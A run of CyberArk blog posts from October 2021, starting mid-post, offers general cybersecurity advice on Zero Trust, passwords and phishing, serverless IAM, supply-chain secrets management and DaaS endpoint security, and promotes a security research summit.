In one of the most open-ended games in the series, participants are divided into teams of two. Each is given a bag of 10 marbles and instructed to obtain all their partner’s marbles by any non-violent means. One of the characters, Cho Sang-woo, devises a scheme for him and his partner to both win and his partner trusts him. Bad call, of course: Cho Sang-woo wins by deceit.

Although the least structured of the games in the series, it may be the most direct. This is Zero Trust in human form, a true insider threat. Even if someone appears to be trustworthy, you shouldn’t hand them all of your marbles (let alone one) until they are properly vetted and verified.

“Glass Bridge” and Learning from Early Adoption

Straying from the idea of simple children’s games, the fifth challenge in Squid Game involves a long glass bridge the remaining participants must cross. The challenge is that some of the panels of glass are solid, while others are weak, tempered glass that will shatter instantly and send them tumbling to their deaths.

The impetus to innovate and find new ways to combat threats — in essence, to be the first one to barrel along the glass bridge — can be rewarding, but it can also be treacherous. Getting ahead of advanced threats is the goal but realizing that it can sometimes take time to suss out the needs of your business or organization is also important. Plus, sometimes it takes learning from an attack to properly illuminate the right path forward.

“Squid Game” and Assume Breach

As we mentioned earlier, the titular squid game is something actually played on South Korean playgrounds. Children draw a large diagram in the dirt or sand, resembling a house with a simple square base and a triangular “roof,” separated by a wall with an opening in the middle. Two circles are then drawn on the ends of the diagram. The goal is simple: one team of defenders must keep a team of attackers from getting through the small opening and into their circle at the top of the triangle by any means necessary.

In the digital world, distinct “lines” delineating corporate networks no longer exist. Instead of trying to guard a constantly morphing perimeter, cybersecurity teams are turning inward to protect what matters most. This is when the concept of “assume breach” comes into play (and actually does on the show as well). Defender Cho Sang-woo assumes attacker Seong Gi-Hun will get through the opening and opts to protect the prized circle at all costs, instead of trying to keep him out of bounds.

Although brutal, Squid Game is ultimately (and arguably) a fun exercise in “what would I do in this situation?” for most viewers — with extra resonance for those making a living protecting shifting landscapes, navigating invisible walls and pathways, and snuffing out untrustworthy visitors in the digital world. The wearing of green tracksuits is optional, of course (but be careful with those dalgona in your candy bucket).

 

]]>
Make Cybersecurity a Priority with Tips from Work and Personal Life https://www.cyberark.com/blog/make-cybersecurity-a-priority-with-tips-from-work-and-personal-life/ Tue, 26 Oct 2021 13:00:15 +0000 https://www.cyberark.com/?p=124256 Make Cybersecurity a Priority with Tips from Work and Personal Life

Employees have been chasing the fabled “work-life balance” for an eternity (or at least as long as there have been LinkedIn “influencers”). But the undeniable truth is that the ‘choice’ to pursue balance was taken away. The time of the pandemic has erased boundaries to the point that, for many of us, “working” and “living” are essentially one and the same.

It’s not all bad, of course. Remote and hybrid work has given office workers more flexibility than they ever thought possible. But it also means careless cybersecurity practices have the potential for broader and more damaging ripple effects.

This final week of Cybersecurity Awareness Month is all about making security an ongoing priority. For individuals today, that means keeping cybersecurity at the forefront of your mind, and borrowing best practices from both work and personal life as you connect daily. And focusing on password health is a great place to start.

“I don’t know about you, but I don’t have any more passwords left in me.”

Yeah, we hear you. Passwords are annoying. But for now, they’re an inevitable part of digital life (though some companies are starting to re-think passwords completely). And today, there’s a chance your own risky password habits have found their way into your workplace and may be putting your company’s data in jeopardy.

Since the pandemic’s arrival, the average consumer has created 15 new online accounts, according to a 2021 IBM survey. It makes sense: we’ve been stuck at home, relying on digital distractions like binging on shows, shopping online and scrolling on social media to pass the time. In juggling so many new and existing online accounts, 82% of people “gave up,” so to speak, and admit to reusing their passwords and credentials at least some of the time, the same IBM survey found.

All the while, workers need to access their company’s network — often from home offices and on personal devices — to do their jobs. A May 2021 HP report found that more than 70% of surveyed employees claim to have access to more company data more frequently than they did before the pandemic. And in too many cases, they’re re-using passwords from other personal accounts to unlock access to customer data, financial records and HR files. What’s more, they’re increasingly using their work devices for personal tasks and even sharing passwords for things like streaming services with friends and family.

It’s a vicious cycle, and attackers are taking full advantage: people are sick of creating and remembering new passwords, so they create ones that are (too) easy to remember, reuse them in multiple places and even share them freely. Bad actors easily crack and compromise these passwords and use them to propagate further attacks — both on other consumers and the companies they work for.

“Someone cracked my password. Now I need to rename my dog.”

Drawing on cybersecurity best practices for both consumers and corporations, here are seven simple steps for boosting online safety:

1. Do a full password reset. Block some time and reset all your personal online passwords. Follow this helpful U.S Cybersecurity and Infrastructure Security Agency (CISA) guidance on things like password length and complexity.

2. Don’t reduce, reuse and recycle. Your passwords, that is. If you’re using the same password across all personal and work accounts, you are essentially opening the door to attackers who can waltz in and gain access to everything.

3. Protect your passwords. It’s a bad habit to store passwords in your browsers. Password managers are not foolproof, but they’re a better option for personal use. An even stronger way to protect a password is to validate it with something unique to you — like your phone or your fingerprint. Enable multi-factor authentication (MFA), utilizing push notifications or biometrics for any service that requires logging in, such as email, banking or social media.

4. Focus on prevention: Never click on suspicious links or open strange attachments and only download software from trusted sources. Phishing and social engineering attacks are still among the most common origins of password theft and data breaches.

5. Browse with caution. Anytime you browse the web at home, always login and run as a “guest” (you’ll see this option when you first turn on your computer and see a list of user profiles). This will give you just enough access to do what you need to do while reducing exposure.

6. Set up account monitoring. It’s also a good idea to set up alerts on your personal accounts to help you recognize and respond to suspicious activity, like fraudulent bank charges, before they become big problems.

7. Pay attention to your devices. Always change default passwords and usernames for home routers and internet-connected devices (thermostats, refrigerators, baby monitors and more) to make them more secure. CISA provides some great tips on ways to protect your digital home and boost your wireless security.

These baseline steps of changing passwords, limiting access, layering login security and monitoring activity are fundamentally the same, whether you’re an individual or company working to #BeCyberSmart. Cybersecurity can’t be an afterthought, and you can apologize to the Netflix freeloaders in your life later. It just must come first.

]]>
Why Tackling Serverless IAM Threats Takes a Team https://www.cyberark.com/blog/why-tackling-serverless-iam-threats-takes-a-team/ Thu, 21 Oct 2021 15:00:15 +0000 https://www.cyberark.com/?p=124001 Why Tackling Serverless IAM Threats Takes a Team

Cloud-native serverless architecture — sometimes known as function as a service, or FaaS — promises to take application development to new heights. Without the burden of managing infrastructure internally, developers can focus their creativity and efforts on writing and deploying code in the cloud without the headaches of running it.

From finance to education, organizations of all types are realizing the benefits of serverless as they mature their multi-hybrid cloud strategies. In fact, McKinsey recently positioned serverless alongside software as a service (SaaS) and open source software as the “technology trifecta” that can “rapidly accelerate business building for established companies that learn how to use them.” The McKinsey researchers shared compelling examples of serverless development in action, from an oil and gas company that spun out a series of products in just 12 weeks using a consistent serverless architecture to a major private equity firm that developed an innovative new investor site using serverless.

Despite the benefits of reduced costs and increased speed, flexibility and accuracy, a long-time security challenge has crept into this shiny new serverless realm: Organizations must effectively manage Identity and Access Management (IAM) permissions across CI/CD pipelines and development teams, while giving everyone (and everything) the access they need to deliver innovation at scale.

Out of perceived necessity, many security architects take a “more is more” approach, granting more permissions than they need. As a result, the risk of accidental exposure is extremely high in these dynamic environments, resulting in too many IAM permissions left in code and deployed into production. Some security architects do try to review code for serverless functions to identify excessive permissions and enforce least privilege on their own. But this takes significant time and resources that can often lead to costly time-to-market delays.

In most cases, serverless architecture is far from the only managed cloud deployment security architects must deal with. And as their security responsibilities grow to span infrastructure and multiple interconnected cloud platforms, so does the challenge of consistently enforcing IAM controls. Meanwhile, since the cloud comes without a perimeter, attackers recognize that compromising an over-permissioned account or role in the cloud can simplify the attack path and help them reach their goals faster. Not surprisingly, software supply chain attacks keep coming and growing in scale and sophistication.

In ongoing conversations with cloud security teams and architects at global organizations, we’re hearing the same serverless security challenges echoed repeatedly:

  • “Our cloud environment is already so complex that it’s difficult to even see where over-permissioned risks exist in serverless applications — let alone do anything about them.”
  • “I can’t detect or remediate these excessive permissions without investing enormous effort.”
  • “Without the right IAM policy recommendations in place, our developers can’t use serverless applications and cloud functions to their full advantage.”

If serverless functions are to become the foundation of future application development processes — as many digital enterprises believe will be the case — the fundamental cybersecurity practice of least privilege enforcement must encompass this foundation and extend to all IT environments without disrupting security or development team productivity.

In the words of Henry Ford, “If everyone is moving forward together, then success takes care of itself.”  Our team at CyberArk Innovation Labs is exploring these challenges as we broaden our capabilities for securing cloud workloads from identity-based attacks. As we continue to innovate and advocate for secure-by-design cloud principles, we’re seeking design partner organizations to test new capabilities for securing permissions used by serverless functions.

If you’re interested in learning more, start investigating excessive permissions in your cloud environments and reach out to hexagon@cyberark.com.

]]>
INTENT Security Research Summit: Explore. Experience. Share. https://www.cyberark.com/blog/intent-security-research-summit-explore-experience-share/ Tue, 19 Oct 2021 13:00:31 +0000 https://www.cyberark.com/?p=123971 INTENT: The Security Research Summit

While enterprises fight to stave off relentless attacks, 57% of them are hamstrung by the ever-worsening global cybersecurity skills shortage. An estimated 4.07 million industry positions remain unfilled at a time when the world needs skilled defenders the most.

Week three of Cybersecurity Awareness Month is dedicated to addressing this pervasive challenge though the exploration of cybersecurity careers. Led by the National Initiative for Cybersecurity Education (NICE), this “Explore. Experience. Share” initiative aims to energize and promote a robust ecosystem of cybersecurity education, training and workforce development.

We spoke with Lavi Lazarovitz, head of CyberArk Labs, and Andy Thompson, CyberArk technical evangelist, about their own cybersecurity careers and how collaboration is key to both personal career fulfillment and overall industry advancement. They also gave us the scoop on INTENT — a virtual research summit for cybersecurity researchers, by researchers, happening November 16, 2021. Founded by CyberArk and Checkmarx and partner organizations Claroty, F5, Imperva, Intezer and SentinelOne, it’s a one-of-a-kind event you won’t want to miss. Here’s what they had to say:

Blog Team: Whether it’s students, veterans or those seeking a career change, cybersecurity is rapidly evolving and has something for everyone. Do you remember what specifically sparked your interest in a cyber career path?

Lavi: One of the things that pushed my curiosity and ultimately led me to the field of cybersecurity research, is the fact that it’s so accessible — you can see and experience everything firsthand. For example, when a big vulnerability is discovered on a user application or popular protocol (like HeartBleed that shook the world in 2014), you can dig into the research others have done, and do your own testing and discover how to adopt a process, such as fuzzing, to find new bugs and security loop holes. When you’re experiencing a vulnerability for yourself, it’s easy to imagine the impact it could have on the services and applications people use on a daily basis — along with the role you can play in mitigating risk and making the digital world a safer place.”

Blog Team: Can you highlight some of the intrinsic characteristics and personality traits that make a great cybersecurity researcher?

Lavi: “Cybersecurity research is all about trying stuff — having that ‘hacker’ mindset of breaking and re-constructing things in new, unique ways. There isn’t always a right way to do it; instead, it’s about being curious and creative and exploring why and how things work. Along with strong technical skills, cybersecurity researchers are typically highly driven individuals who thrive on learning from one another and often have a bit of a competitive streak.”

Blog Team: Can you describe how the CyberArk Labs team approaches their cybersecurity research projects — and how it’s helping drive greater industry awareness around emerging threats?

Lavi: “The research team is the foundation of CyberArk Labs. What started out as four researchers has grown into an elite team of dozens of white-hat hackers, intelligence experts and world-renowned cybersecurity practitioners, many of whom served in the Israeli Defense Force. Working side by side, they examine emerging attack techniques and post-exploit methods to understand the attack chain and how attackers operate. Their work puts us in a strong position to not only ensure CyberArk customers are more secure, but also to benefit the entire cybersecurity community. We believe security is a team game; it’s all about collaboration. That’s what you see within CyberArk Labs and that’s why we’re putting on the security research summit, INTENT, on November 16.”

Blog Team: Tell us more about INTENT and why cybersecurity practitioners and researchers should plan to attend next month.

Andy: “We’re excited about the format of this virtual event, being led out of Israel, where attendees will learn from acclaimed security researchers from around the world, such as Benjamin Delpy (aka gentilkiwi, the developer behind Mimikatz).”

“Beyond exploring findings of some major new research projects, we’re pulling the curtain back to reveal the process itself: how to deconstruct the attack cycle and adopt an attacker’s mindset to discover critical security holes that can be exploited. And we’re giving it to you straight: sometimes things don’t go as planned. We’ll show what happens when security research goes wrong and what you can learn from it.”

Blog Team: We understand the INTENT team has been hard at work reviewing speaking submissions and finalizing the agenda. Could you give us a sneak peek at some sessions you’re particularly excited about?

Andy: “We’ve got a jam-packed agenda — it’s hard to choose favorites — but here are three sessions that attendees won’t want to miss:

  • An elite hardware white-hat hacker’s real-world account of reverse-engineering a major city’s smart meter system to determine electrical uptimes during the worst winter storm in decades and to help keep citizens safe;
  • How a security research group teamed up to uncover vulnerabilities in one of the world’s top collaboration software tools — and landed a major prize in the process; and
  • A deep dive into VSCode extension vulnerabilities and their far-reaching implications.”

Blog Team: INTENT is a great example of the industry’s push for deeper collaboration and information sharing — what many believe are keys to improving the overall security posture of organizations and governments everywhere. Why is this so important?

Lavi: “As security researchers, we’re focused on unearthing vulnerabilities everywhere. We regularly share our research findings with other industry organizations, along with government and law enforcement agencies that can use our findings to deepen real-world vulnerability investigations. For instance, CyberArk is part of the Institute for Security and Technology (IST) Ransomware Task Force — a coalition of public and private sector organizations that have joined forces to provide clear recommendations on ransomware mitigation. We all bring unique experiences and perspectives to the table and are united by a common mission to make systems safer.”

Blog Team: In closing, what would you say to those considering a career in cybersecurity research today?   

Andy: “Whether you’re on the offensive or defensive side, you’re on the good team, fighting the good fight. The work you do every day truly matters — and it makes our society, and our world, a better place.”

Have a passion for collaborative problem-solving and hands-on security research? Register for INTENT today to save your spot. And if you’re considering a career in cybersecurity or looking for advancement opportunities this Cybersecurity Awareness Month, check out CISA’s Cyber Career Pathways Tool, aligned to the NICE Cybersecurity Workforce Framework, and our own CyberArk training and certification offerings to get started.

]]>
Software Supply Chain Attacks: Who Owns the Risk and What Can Be Done? https://www.cyberark.com/blog/software-supply-chain-attacks-who-owns-the-risk-and-what-can-be-done/ Fri, 15 Oct 2021 12:00:46 +0000 https://www.cyberark.com/?p=123885 Software Supply Chain Attacks: Who Owns the Risk and What Can Be Done?

Editor’s Note: This post was co-authored by John Walsh, senior product marketing manager, DevOps security, CyberArk  and Tim Johnson, director, product marketing, CloudBees, and the original version was published on CloudBees.com. The post has been updated to include recent industry guidance. 

By the time you hear about a software supply chain attack, it will have already become a massive problem and public relations nightmare. However, these attacks don’t start out that way. In fact, they almost always begin with a tiny gap, like an exposed Git credential or a misconfigured CI/CD tool, earlier in the supply chain. And that’s exactly what cyber adversaries are looking for.

Attackers infected more than 18,000 conscientious SolarWinds customers by injecting malicious code into an otherwise legitimate software update. The April 2021 Codecov breach was traced back to a process error that enabled the bad actors to extract credentials and modify scripts. In the massive Kaseya ransomware attack, trusted software was compromised to reach into the company’s global customer base. And things are only expected to get worse. According to Gartner®, “By 2025, 45% of organizations worldwide will have experienced attacks on their software supply chains, a three-fold increase from 2021.”[1]

These recent headline-grabbing attacks have resulted in significant financial and reputational damage and prompted many organizations to re-examine their own development environments and delivery practices to identify vulnerabilities. And they’re getting to the heart of the issue: unprotected secrets (credentials, SQL/LDAP passwords, SSH keys and API tokens) that provide privileged access to the organization’s most valuable data and resources. A single, unprotected access point is all it takes for an attack to rip through an entire IT environment and move downstream to customers and partners.

The “Secret” to Software Delivery Automation 

Jenkins — plus all the other tools, platforms and containers used by developers to automate software delivery — must be able to interact with numerous systems and applications throughout the DevOps environment to accomplish its role as the “butler.” To do this, it requires access to the powerful secrets used to source control and deploy artifacts.

If not configured properly and secured, these secrets become easy — and valuable — targets for attackers. CI/CD pipeline and other DevOps tools are “Tier Zero” assets: access them and you get access to more privileged credentials. Using compromised privileged credentials, attackers can take confidential data, inject malware into the codebase, make significant changes to an application’s functionality or steal code and valuable IP from repositories.

Gartner® has issued the following guidance: “We recommend privileged access management (PAM) tools to monitor and protect privileged service accounts that run builds and automation jobs. In the SolarWinds attack, attackers modified trusted domains and abused privileged roles. We see that as a confirmation that privileged accounts are a primary target. Mitigating this risk often requires privileged accounts to be managed by a PAM.”[2]

It’s clear that protecting the privileged access embodied in secrets and credentials across the DevOps pipeline is key to protecting software integrity and securing the supply chain. But who ultimately bears this responsibility?

Who Actually Owns Software Supply Chain Risk? 

The shift to modern infrastructure and DevOps has created complexity and differences in how security needs are met. Regulations and industry standards such as Sarbanes-Oxley (SOX) require organizations to take ownership of supply chain risk, implement specific DevOps security controls and provide greater transparency to minimize risk. Meanwhile, customer demands for security assurance, coupled with modern digital experiences, are increasing rapidly.

Security teams are charged with securing digital value chains that protect customer data, starting with who, or what, is allowed to access what within the CI/CD pipeline and production environments, when and for how long. The challenge is finding a way to achieve that goal without slowing down developers.

Developers face their own security dilemma: with a laser-focus on bringing innovations to market fast, the DevOps culture emphasizes high velocity, intensive sharing of code, ad-hoc tooling and full-on automation. In this culture, low-security shortcuts often flourish, such as putting unprotected secrets in JenkinsFiles to save time or reusing open-source code from the internet without sufficient scrutiny. The last thing they want is someone else preventing them from getting their work done, and they don’t really want to have to “own” security, yet they do not want to be held responsible for a costly breach-related outage.

As a result, some types of DevOps security, vulnerability and code scanning are being integrated into DevOps processes. Yet in many organizations, secrets management remains a basic functionality that’s fragmented across individual DevOps tools, making them difficult for developers (who don’t have time to become security experts) to manage and secure. When security issues are discovered — sometimes right before code is scheduled to go into production — developers feel the pain in terms of last-minute code changes and delayed releases.

The evolving development landscape requires security and development to work together to secure secrets across the CI/CD environment to reduce risk and minimize damage from the next supply chain threat. A centralized approach to secrets management makes it easier for developers to maintain their existing workflows and keep moving fast.  

Follow These Three Steps to Protect the Pipeline 

Most organizations already have established requirements for securing credentials with secrets management in traditional IT systems, such as automatically rotating, centrally storing and continuously monitoring credentials and secrets. However, to protect your software supply chain and secure the CI/CD pipeline, you also need to implement these secrets management best practices throughout the Jenkins pipeline, within DevOps tools and admin consoles, on developer workstations and in applications and scripts. The most effective strategy follows these steps:

  • Enforce the “least privilege principle” to limit secrets exposure. Apply role-based access control (RBAC) so the developer, tool, application, container, script or automation process only has access to the credentials it needs. This, for example, will help prevent untrusted parties from configuring jobs and help ensure valuable credentials, such as deployment tokens, are segregated by appropriate access restrictions or deployed from a second secure Jenkins server.
  • Remove all hard-coded secrets in code, DevOps tools, configuration files and scripts. It’s also important to never use default passwords. For example, some tools establish a developer default user to create projects; other tool consoles can be accessed using http or with the default password.
  • Authenticate access to secrets. This extra layer of protection requires attackers to take extra steps beyond stealing a single secret known as “secret zero.”

A centralized secrets management platform will make these best practices far easier to implement and manage by giving your organization a complete and continuous picture of “who has access to what.”

Orchestrating Trust in the DevOps Pipeline: Where to Go from Here?

While the notion of “shift left” to build safer and more efficient CI/CD practices and processes is widely understood, putting it into practice can be difficult. It’s important for the security team to take the lead in integrating security into the DevOps processes before poor practices become entrenched. And instead of viewing security as the “release prevention department,” developers should make it a practice to bring security in at the planning stage — and keep security tightly integrated in the CI/CD process from end to end.

Here are four practical recommendations for making this collaborative approach a reality:

1. Security teams must get up to speed on DevOps tools and techniques to credibly communicate risk and best practices to their development counterparts. And by using agile and DevOps methods within their own security practices, such as automating security tasks and delivering security capabilities in smaller, more frequent increments, they can gain a deeper understanding of DevOps.

2. Implement a security team-owned solution that provides critical capabilities, such as secrets management, in machine-consumable ways that can be integrated into automated processes, like security policy as code. This makes it easier for developers to get the access they need to do their jobs, while doing the “right” thing from a security perspective.

3. Teams should jointly consider how best to deploy security resources into existing or new organizational models and structures. For example, establishing centers of excellence, community leaders and security champions and embedding security team members inside development teams. “Results from Gartner’s 2021 Enabling Cloud-Native DevSecOps survey showed that creating a cloud center of excellence (COE) was considered as the single most effective measure to improve security, with 31% of respondents naming it as their first choice.”[3]

4. Offer developer training on specific attacker tactics and show how sample code modules could expose secrets and provide examples as user stories. For example, “As an attacker, I would scan the organization’s code repositories looking for secrets.” Take the team through a penetration testing exercise or engage a Red Team to demonstrate how an attacker could compromise a CI/CD pipeline.

With the right tools and strategy in place, security teams can more effectively partner with developers to establish more agile, secure and productive dev environments downstream in your software supply chains.

 

[1] Gartner, “How Software Engineering Leaders Can Mitigate Software Supply Chain Security Risks,” 15 July 2021. Manjunath Bhat, Dale Gardner, Mark Horvath

[2] Gartner, “How Software Engineering Leaders Can Mitigate Software Supply Chain Security Risks,” 15 July 2021. Manjunath Bhat, Dale Gardner, Mark Horvath

[3] Gartner, “Survey Analysis; Enabling Cloud-Native DevSecOps,” 13 September, 2021. Dionisio Zumerle

GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.

 

 

 

]]>
8 Ways to “Fight the Phish” this Cybersecurity Awareness Month https://www.cyberark.com/blog/8-ways-to-fight-the-phish-this-cybersecurity-awareness-month/ Wed, 13 Oct 2021 20:12:35 +0000 https://www.cyberark.com/?p=123914 8 Ways to “Fight the Phish” this Cybersecurity Awareness Month

We’ve all been targeted in phishing attacks — fake messages from a seemingly trusted or reputable source designed to convince you to click on a malicious link, reveal information, give unauthorized access to a system or execute a financial transaction. During this second week of Cybersecurity Awareness Month, pay extra attention to those emails, text messages and chat boxes coming from a stranger or someone you weren’t expecting — and think before you click!

Many phishing attempts are easily recognizable, like Mark Zuckerberg contacting you personally about a prize you’ve won. If you’re ever in need of a laugh, this guy spent two years replying to phishing emails and then wrote an entire book on his hilarious exchanges with fraudsters.

At this point, phishing is widely accepted as a “given” — part of daily online life. However, attackers keep innovating, finding new ways to social engineer their victims by preying on their natural curiosity, trust and compassion for others. And today, there are plenty of phishing schemes that aren’t so obvious and can potentially dupe even the most cautious online user. For example, highly convincing COVID-19 scams, from Facebook messages from “friends” who’ve fallen on hard financial times to emails requesting proof of vaccination status, are rampant right now.

According to US-CERT, some of the most common — and seemingly legitimate — phishing emails include fake communications from online payment or internet service providers (claiming there is a “problem” with your account); false accusations from the FDIC on violating the Patriot Act (requesting that you to “verify” your identity); and phony communications from your employer’s IT department (seeking passwords or other sensitive information that somebody can use to gain access to corporate systems and data).

Spot Phishing Attempts and Protect Your Digital Identity with These Simple Tips

The good news is that you can avoid most phishing and social engineering attempts altogether with a healthy dose of skepticism and common sense and by following these simple steps:

1. Choose your friends wisely. It’s solid advice in real life — and even more critical in the digital world. If you receive a LinkedIn message or Instagram friend request from someone you don’t know, do not respond, accept or click on any links within the message … which leads us to tip #2.

2. Don’t click on hyperlinks. Never click on a link from an unverified source. And remember, even emails sent from familiar sources can lead to issues: malware, ransomware and viruses can spread by scanning your device for other email addresses, then sending themselves to those email addresses in messages supposedly “sent” by you.

3. Urgent? Not so fast … Many phishing emails and messages attempt to create a sense of urgency, causing the recipient to fear their account or information is in jeopardy. Here’s a real-life example from the Federal Trade Commission: “Our records indicate that your account was overcharged. You must call us within 7 days to receive your refund.” If you receive a suspicious email that appears to be from someone you know, reach out to that person directly. If the email comes from an organization but still looks “phishy,” reach out to them via customer service to verify the communication.

4. Step away from that personality quiz — and think twice before you post that update. Sure, social media quizzes are a fun way to kill time (who doesn’t want to know their celebrity doppelganger?!), but they’re also an excellent way for attackers to get a hold of your personal details. While taking a seemingly harmless quiz, you may disclose things like your full name, birthday or employer. The same advice applies to your regular social media posts — think twice before you put too much out there. Cyber criminals can use all this personal information to take advantage of you. What’s more, you could be handing them the answers to your security and password recovery questions.

5. Turn off location sharing whenever possible. Attackers can use location-sharing information to craft phishing messages that seem very timely and relevant. For instance, your location is embedded as metadata in every picture you take with your phone. Turn location services off when you aren’t using them to make it more difficult for bad actors to view this information.

6. Protect your personal computers and mobile phones. US-CERT recommends installing antivirus software and personal firewalls on your personal devices and making sure they’re set for automatic updates. It’s also essential to keep business and personal use separate — especially if you’re working remotely: don’t use your corporate device out of convenience to browse the internet, online shop, scroll through social media or check personal email.

7. Take back control of your spam folder. While not every message that falls into your spam filter is a phishing email, many of them are. Take some time this month to clean up your spam (or set up filters to keep junk out of your inbox), browse this helpful list from CISA on reducing junk mail and say goodbye to those bogus business opportunities, chain letters and too-good-to-be-true diet scams.

8. Protect your online accounts with multifactor authentication (MFA). According to National Institute of Standards and Technology (NIST) guidance, the passwords and passphrases you use should be as long and complex as possible — and never used in more than one place. But if you think passwords alone will protect you, think again. Many digital accounts such as email, online banking and social media give you the option of enabling MFA to add an extra layer of protection to the sign-in process. MFA typically combines at least two of the following:

  • Something you know: a password, PIN or answer to a security question
  • Something you have: a mobile device
  • Something you are: a fingerprint or facial recognition

Combining these different types of identification can help to ensure you are who you say you are. Need more convincing? A study conducted by Google, New York University and University of California San Diego found that using MFA blocked 100% of automated bots, 99% of bulk phishing attacks and 66% of targeted attacks on users’ Google accounts. Reference CISA’s MFA tip sheet for more details.

To test your ability to spot a “phish,” check out these real-world examples of phishing emails, and some other helpful steps you can take if a phishing attack has targeted you. And come back soon for week three of Cybersecurity Awareness Month to explore stories from our team about why they chose cybersecurity as a career — and how collaboration is key to continued innovation.

]]>
Hybrid Work Brings DaaS and Endpoint Risks https://www.cyberark.com/blog/hybrid-work-brings-daas-and-endpoint-risks/ Thu, 07 Oct 2021 13:00:40 +0000 https://www.cyberark.com/?p=123834 Hybrid Work Brings DaaS and Related Risk

It happened so gradually that we almost didn’t notice it. The initial rush to establish remote work systems was fueled by frantic desperation and necessity. Businesses that never even considered having a remote workforce were thrown into the deep end to sink or swim. To facilitate flexible ways of working, many doubled down on Virtual Desktop Infrastructure (VDI), in-house hosted digital workstations that enable access to corporate assets and applications from remote devices and locations. Others chose to connect their workers via Desktop as a Service (DaaS), virtual desktop tools that are easily deployed and fully managed by third-party providers. But while the importance of securing physical endpoints like desktops, laptops and servers was top-of-mind during this time, these cloud-based virtual machines were, in fact, also endpoints that posed similar risks and broadened the attack surface substantially. Except many companies weren’t thinking of them like that.

After the initial adrenalin wore off, employers and employees eased into a kind of semi-comfort zone. Remote work was, well, working. But just as companies began to ponder when a return to a traditional office might be possible, their now thoroughly ensconced workforce was pondering why they’d ever want to go back. The idea of hybrid working schedules began to formulate, but the path forward was still not entirely clear. And while this tug of war is currently playing out in what is being called “The Great Resignation,” malicious actors are making the most of this perfect storm of device-hopping employees, decentralized IT services and new attack vectors.

While VDI and DaaS systems have been around for a while, they’re now seeing renewed relevance as the cornerstones of distributed work models, as they give users the ability to access their work desktops, applications and data from anywhere in the world, on any device. But despite their many benefits, they also provide new, more efficient ways for attackers and ransomware actors to ply their trade. The numbers would almost seem like parodies if they weren’t so chilling — for instance, Remote Desktop Protocol (RDP) attacks rose 241% in 2020, from 969 million to 3.3 billion. Like a wounded seal flopping in the ocean, the ripples of billions of new, often unsecured endpoints frantically popping up overnight were attracting sharks. If remote work is, indeed, here to stay (and it looks as if it is — an Accenture report found that 63% of high-revenue growth companies are using hybrid workforce models and that 83% of workers prefer hybrid), then there’s much work to be done to shore up security.

Consolidating Your Strategy to Secure Endpoints Everywhere

The truth is that even supremely vigilant organizations will face exposure through DaaS and VDI systems, due to the sheer number of new attack surfaces created by a remote workforce using a combination of company-provided and personal devices. What’s more, DaaS users are often IT admin users with higher levels of privileged access than a typical business user, which makes them high-value targets for attackers.

And while these services may be new to some organizations, they are already very familiar to malicious actors. Remote code executions (RCE) are code vulnerabilities that can be easily exploited — one of the more infamous, BlueKeep, has plagued Windows operating systems since Windows 2000. The same flaws that allow for unauthorized access to a singular desktop operating system are now amplified through remote desktop environments, and attacks are proliferating as a result.

But the remedy isn’t that severe. In fact, it’s really what any company should be implementing regardless of where, when, or on what devices their employees choose to work: adopt one cohesive strategy for securing every endpoint. Because trying to juggle separate policies for remote and/or BYOD workers and in-office employees will undoubtedly lead to operational headaches and potentially dangerous security gaps.

A comprehensive endpoint strategy should center on an “assume breach” mentality. Accept that some attackers will slip through and set about limiting what they can do and where they can go once they’re inside. That way, remote desktop or not, your business’s most critical assets will be protected.

Building a Master-Level Maze, Not Walls

Unfortunately, the “firewall” concept persists. There is still that sense that locking doors and setting up walls will keep the bad guys out. Cybersecurity simply doesn’t work that way anymore. Think of it less like putting up a wall and more like building a multi-level maze that’s nearly impossible to get through. Attackers may find entrances, but once inside their paths are impeded and stairs are obfuscated to the point of rendering them mostly harmless to the truly valuable information and systems.

Consider these three-pointers when building your own security labyrinth to confound attackers:

1: Extend strong endpoint protection to all VDI and DaaS instances  

Building your “maze” begins with the understanding that any identity within your organization — whether remote worker, IT admin, third-party vendor, device or application — can become privileged under certain conditions. Implementing controls that can intelligently limit access to just what a user identity needs helps protect privileged accounts from unauthorized access, but they have to be enforced consistently.

Focus on extending existing endpoint security controls to every DaaS or VDI instance, even if the end-user happens to be using a BYOD device, to minimize the risk of data theft or system disruption. As part of this, consider tools that can help DaaS administrators easily remove local admins from all DaaS instances to minimize the risk of ransomware and other endpoint attacks.

2: Keep watch for insider threats

One of the major concerns organizations have about remote and hybrid work is that they can’t physically keep an eye on their workforce and therefore their systems are less secure. While a recent study showed that 52% of employees do feel they can get away with riskier behavior when working from home, the truth is that sitting in an office isn’t necessarily any more secure, as insider threats are a constant.

Rather than looking for one security silver bullet (spoiler: none exist), layer controls and detective mechanisms to help prevent malicious insiders from accomplishing their goals. For example, privilege deception functionalities can quickly detect and block lateral movement in the network/OS instance, minimizing the impact on the logged-in user and stopping the ripple effect across users sharing the same instance. Again, the goal is to architect something closer to a security ecosystem, rather than a series of flimsily locked gates.

3: Integrate endpoint security controls with MFA

When privileged access controls are integrated with multi-factor authentication (MFA) to enable secure VDI and DaaS instance logins, password-related risks drop substantially. “Step up” MFA can also help ensure safe and secure privileged access to applications — yet another way to build twists, turns and dead ends that can corral malicious agents and severely impede their plans to march through your system.

Not only does MFA coupled with endpoint privileged access controls minimize risk, but it also gives remote and hybrid employees increased flexibility in where and when they work — which is, of course, the point. When employees feel like they have more freedom and flexibility — and companies know every identity (human or application) is secure throughout the cycle of accessing critical assets — then hybrid, distributed work ceases to be a frantic necessity and becomes a viable professional reality.

Embracing distributed work doesn’t mean resigning your company to constant cybersecurity duress; it simply calls for a unified endpoint security strategy and a solid foundation of tools, technologies and policies. Cloud-based tools like VDI and DaaS can, and should, be tools for growth and don’t have to be a constant source of consternation or concern.

Shameless plug alert: By consistently enforcing least privilege, CyberArk Endpoint Manager can help your organization tackle these important steps, while still giving end-users the control they need to work efficiently.

Have three more minutes? Check out CyberArk Endpoint Privilege Manager in action as it removes local admin rights on a virtual workspace to reduce DaaS security risks. You’ll also see some privilege elevation examples for specific administrative tasks.

 

]]>
Rethinking Passwords this Cybersecurity Awareness Month https://www.cyberark.com/blog/rethinking-passwords-this-cybersecurity-awareness-month/ Mon, 04 Oct 2021 12:56:43 +0000 https://www.cyberark.com/?p=123738 Passwordless Authentication Cybersecurity Awareness Month

